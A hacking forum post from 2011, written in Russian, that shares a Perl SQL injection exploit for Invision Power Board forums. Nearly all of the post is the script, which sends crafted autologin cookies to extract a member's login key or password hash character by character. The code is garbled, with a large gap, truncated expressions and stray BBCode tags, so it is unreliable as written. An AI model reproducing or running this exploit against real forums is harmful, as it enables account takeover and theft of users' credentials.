07.04.2011, 15:47
|
|
Новичок
Регистрация: 03.04.2011
Сообщений: 10
С нами:
7952726
Репутация:
0
|
|
Exploit Hack Forum IPB >3.1.4 CP n Perl
Exploit Hack Forum IPB 3.1.4 CP n Perl
SQL Injection Exploit
[PHP]
[COLOR="#000000"] #!/usr/bin/perl
## Invision Power Board SQL injection exploi t by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.* , 2.* , 3.*(0){
printqq{\b\b DONE]
MEMBER ID:$member_id
};
print (($target)?('MEMBER_LOGIN_KEY : ') 'PASSWORD : '));
print$allchar."\r\n";
}
else
{
print"\b\b FAILED ]";
}
exit();
}
else
{
$allchar.=chr(42);
}
$s_num++;
}
sub found($$)
{
my $fmin=$_[0];
my $fmax=$_[1];
if (($fmax-$fmin)new(Proto=>"tcp",PeerAddr=>"$server",PeerPort=>"80");
printf $socket("GET %sindex.php?act=Login&CODE=autologin HT TP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nC onnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
while()
{
if (/Set-Cookie:session_id=0;/) { return1; }
}
return0;
}
sub status()
{
$status=$n%5;
if($status==0){ print"\b\b/]"; }
if($status==1){ print"\b\b-]"; }
if($status==2){ print"\b\b\\]"; }
if($status==3){ print"\b\b|]"; }
}
sub usage()
{
printq(
Invision Power Board v[COLOR="#007700"]
|
|
|